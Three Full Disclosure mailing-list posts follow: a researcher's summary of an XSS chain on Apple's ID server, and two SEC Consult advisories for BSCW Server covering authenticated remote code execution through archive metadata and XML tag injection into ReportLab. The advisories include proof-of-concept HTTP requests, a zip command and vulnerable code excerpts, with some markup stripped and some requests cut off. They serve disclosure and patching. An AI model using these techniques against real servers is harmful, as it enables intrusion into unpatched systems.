[FD] XSS in Apple ID Server idmsa.apple.com
Hi seclists! I wanted to try posting some of my research here, and I think this is the right list. I recently published some research into Apple ID security that culminated in an XSS on the Apple ID server -- that is, an attacker can pop out an Apple login page that autofills your credentials and 2FA :) In particular, it has several really interesting components in the chain: - a Content Security Policy injection / bypass to slacken Javascript code execution and embed restrictions - bypass to postMessage restrictions on sending and receiving messages that uses some deep diving into the relevant spec - several bugs that involve interpretation malleability of URLs I was surprised to find out that postMessage's 'targetOrigin' parameter does not, as the spec describes, take a target origin, but actually a target *URL* which is then *parsed* to extract an origin. This means that, say 'https://nonsense:morenonse...@apple.com/somepath?nonsense#nonsense' as a *targetOrigin* will match 'https://apple.com'. The full write-up can be found here: https://zemnmez.medium.com/how-to-hack-apple-id-f3cc9b483a41 Thomas ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] SEC Consult SA-20210827-0 :: Authenticated RCE in BSCW Server
SEC Consult Vulnerability Lab Security Advisory < 20210827-0 > === title: Authenticated RCE product: BSCW Server vulnerable version: BSCW Server <=5.0.11, <=5.1.9, <=5.2.3, <=7.3.2, <=7.4.2 fixed version: 5.0.12, 5.1.10, 5.2.4, 7.3.3, 7.4.3 CVE number: CVE-2021-39271 impact: high homepage: https://www.bscw.de/classic/ found: 2021-06-30 by: Armin Stock (Atos Germany) SEC Consult Vulnerability Lab An integrated part of SEC Consult, an Atos company Europe | Asia | North America https://www.sec-consult.com === Vendor description: --- "A versatile system for any field of application BSCW Classic is in use around the world. With more than 500 functions, it offers the right solution for every task. Turn your ideas into reality! Our proven system has been supporting information flow and knowledge management at numerous companies for more than 20 years." Source: https://www.bscw.de/en/classic/ Business recommendation: The vendor provides a patched version for the affected products which should be installed immediately. Vulnerability overview/description: --- 1) Authenticated RCE The application allows a user with low privileges to upload different kind of archives (`ZIP`, `tar`, `RFC822`) and extract them on the server. During the extraction process a special file (`.bscw`) is processed to attach metadata to the files created during extraction. This metadata file contains an attribute (`class`), which is later used to instantiate a class/call a function to create the desired object. As there is no allow-list implemented to limit the class/function which can be called, it is possible to call an arbitrary `Python` function. During the function call there are two parameters provided, where the first is controlled by the attacker (a element from the metadata file: `bscw:name`). Proof of concept: - 1) Authenticated RCE The first step is to create an archive with a malicious `.bscw` file. $ zip ../data.zip ./.bscw ./* --- http://bscw.de/bscw/bscwarc.dtd;> http://bscw.local; timestamp="20210630T123242Z" pathsep="\\"> http://bscw.de/bscw/elements/0.1/doc/; xmlns:bscw="http://bscw.de/bscw/elements/0.1/; > HTML Document CONTENT OF FIRST PARAMTER --- Then the archive can be uploaded to a folder (OID: 267), where the user has write access to: --- PUT /sec/bscw.cgi/267/data.zip HTTP/1.1 Host: bscw.local:8080 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/zip Content-Length: 1559 DNT: 1 Connection: close Cookie: bscw_auth="" PK. --- After uploading the archive the `extract` operation can be called for the new created file object (OID: 1179): --- GET /sec/bscw.cgi/267?op=extract=267_1179 HTTP/1.1 Host: bscw.local:8080 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Connection: close Referer: http://bscw.local:8080/sec/bscw.cgi/267 Cookie: bscw_auth="" Upgrade-Insecure-Requests: 1 --- During the extraction the function from the `class` attribute is located and called. --- # File: bs_extract.py def createArtifact(self, request, tree, user, target=None): """create artifact for user and add to target returns tuple (artifact, oldid) - or (None, None) """ # # Locating the class/function # klass = metadata 'class' attribute klass_tuple = klass.split('.') klass_name = klass_tuple[(-1)] klass_modul = ('.').join(klass_tuple[:-1]) try: modul = __import__('bscw').module(klass_modul) except ImportError as ie: log_arc.warning('ImportError: %s ', str(ie)) klass = 'bscw.core.cl_folder.Folder' modul = None if modul and hasattr(modul, klass_name): cons
[FD] SEC Consult SA-20210827-1 :: XML Tag injection in BSCW Server
SEC Consult Vulnerability Lab Security Advisory < 20210827-1 > === title: XML Tag injection product: BSCW Server vulnerable version: BSCW Server <=5.0.11, <=5.1.9, <=5.2.3, <=7.3.2, <=7.4.2 fixed version: 5.0.12, 5.1.10, 5.2.4, 7.3.3, 7.4.3 CVE number: CVE-2021-36359 impact: high homepage: https://www.bscw.de/classic/ found: 2021-06-30 by: Armin Stock (Atos Germany) SEC Consult Vulnerability Lab An integrated part of SEC Consult, an Atos company Europe | Asia | North America https://www.sec-consult.com === Vendor description: --- "A versatile system for any field of application BSCW Classic is in use around the world. With more than 500 functions, it offers the right solution for every task. Turn your ideas into reality! Our proven system has been supporting information flow and knowledge management at numerous companies for more than 20 years." Source: https://www.bscw.de/en/classic/ Business recommendation: The vendor provides a patched version for the affected products, which should be installed immediately. Vulnerability overview/description: --- 1) XML Tag injection The application allows a user with low privileges to export different objects to a `PDF` file (`Send To -> File(PDF)`) via the `exportpdf` package. To export the content of the objects the framework ReportLab is used. This library supports different tags to export structured content: --- # File: reportlab/platypus/paraparser.py !!! NOTE !!! THIS TEXT IS NOW REPLICATED IN PARAGRAPH.PY !!! The ParaFormatter will be able to format the following tags: < /b > - bold < /i > - italics < u [color="red"] [width="pts"] [offset="pts"]> < /u > - underline width and offset can be empty meaning use existing canvas line width or with an f/F suffix regarded as a fraction of the font size < strike > < /strike > - strike through has the same parameters as underline < super [size="pts"] [rise="pts"]> < /super > - superscript < sup ="pts"] [rise="pts"]> < /sup > - superscript < sub ="pts"] [rise="pts"]> < /sub > - subscript < bullet > - bullet text (at head of para only) link text attributes of links size/fontSize/uwidth/uoffset=num name/face/fontName=name fg/textColor/color/ucolor=color backcolor/backColor/bgcolor=color dest/destination/target/href/link=target underline=bool turn on underline anchor text attributes of anchors fontSize=num fontName=name fg/textColor/color=color backcolor/backColor/bgcolor=color href=href width="w%" --> fontSize*w/100 idea from Roberto Alsina height="h%" --> linewidth*h/100 - ... turn off word breaking and hyphenation The whole may be surrounded by tags --- The application does not properly encode the user content before passing it to `ReportLab`, which allows the user to inject own tags. These tags get evaluated by the `ReportLab`. Depending on the version of `ReportLab` it allows the user to do a `SSRF` (server side request forgery) attack via the `img` tag (https://snyk.io/vuln/SNYK-PYTHON-REPORTLAB-1022145). There are also known vulnerabilites in `ReportLab`: * https://www.cybersecurity-help.cz/vdb/SB2019101613 * https://hg.reportlab.com/hg-public/reportlab/rev/b117091a73c2 This allows an attacker to execute `Python` code via the `unichar` tag or the `color` attribute. Proof of concept: - 1) XML Tag injection One possible injection point is the `description` of a folder. Using the following payload allows the execution of the `Python` code `28+20`. hello The result of this code is `48` (ASCII: `0`), which gets written to the generated `PDF` file. --- POST /sec/bscw.cgi/1917?op=_editfolder.EditFolder HTTP/1.1 Host: bscw.local:8080 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: text/html,application/xhtml+xml,